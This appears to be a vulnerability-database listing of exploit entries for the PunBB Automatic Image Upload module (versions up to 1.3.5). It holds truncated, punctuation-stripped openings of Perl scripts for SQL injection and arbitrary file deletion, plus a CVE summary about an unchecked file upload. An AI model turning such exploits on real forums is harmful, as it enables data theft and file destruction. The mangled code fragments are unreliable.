PunBB Automatic Image Upload <= 1.3.5 - Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl 0-Day PunBB Automatic Image Upload = v1.3.5 Remote SQL Injection Exploit Coded By Dante90, WaRWolFz Crew Bug Discovered By: Dante90, WaRWolFz Crew Works only if '$AllowStats = USERGROUP;' is not commented in uploadimgconfig.php FIND LINE: 75...

PunBB Automatic Image Upload 1.3.5 SQL Injection

!/usr/bin/perl 0-Day PunBB Automatic Image Upload $AllowStats = "Members"; use LWP::UserAgent; use HTTP::Cookies; use strict; my $UserName,$PassWord,$ID = @ARGV; if@ARGV 'Mozilla/5.0', maxredirect = 0, cookiejar = $Cookies, or die $!; sub Login my $Login =...

PunBB Automatic Image Upload &lt;= 1.3.5 Delete Arbitrary File Exploit

No description provided by source. !/usr/bin/perl 0-Day PunBB Automatic Image Upload = v1.3.5 Delete Arbitrary File Vulnerability Coded By Dante90, WaRWolFz Crew Bug Discovered By: Dante90, WaRWolFz Crew Works only if '$AllowDelete = "USERGROUP";' is not commented in "uploadimgconfig.php" FIND...

PunBB Automatic Image Upload 1.3.5 Delete File

!/usr/bin/perl 0-Day PunBB Automatic Image Upload $AllowDelete = "Members"; use LWP::UserAgent; use HTTP::Cookies; my $UserName,$PassWord,$DirectoryFile,$DeleteFile = @ARGV; if@ARGV 'Mozilla/5.0', maxredirect = 0, cookiejar = $Cookies, or die $!; sub Login my $Login =...

PunBB Automatic Image Upload 1.3.5 - SQL Injection

!/usr/bin/perl 0-Day PunBB Automatic Image Upload $AllowStats = "Members"; use LWP::UserAgent; use HTTP::Cookies; use strict; my $UserName,$PassWord,$ID = @ARGV; if@ARGV 'Mozilla/5.0', maxredirect = 0, cookiejar = $Cookies, or die $!; sub Login my $Login =...

PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete

PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete !/usr/bin/perl 0-Day PunBB Automatic Image Upload $AllowDelete = "Members"; use LWP::UserAgent; use HTTP::Cookies; my $UserName,$PassWord,$DirectoryFile,$DeleteFile = @ARGV; if@ARGV 'Mozilla/5.0', maxredirect = 0, cookiejar = $Cookies, or...

PunBB Automatic Image Upload 1.3.5 - SQL Injection

PunBB Automatic Image Upload 1.3.5 - SQL Injection !/usr/bin/perl 0-Day PunBB Automatic Image Upload $AllowStats = "Members"; use LWP::UserAgent; use HTTP::Cookies; use strict; my $UserName,$PassWord,$ID = @ARGV; if@ARGV 'Mozilla/5.0', maxredirect = 0, cookiejar = $Cookies, or die $!; sub Login m...

CVE-2007-6527

uploadimg.php in the Automatic Image Upload with Thumbnails imgUpload module 1.3.2 for PunBB only verifies the Content-type field of uploaded files, which allows remote attackers to upload and execute arbitrary content via a file with a 1 JPG, 2 GIF, or 3 PNG MIME type...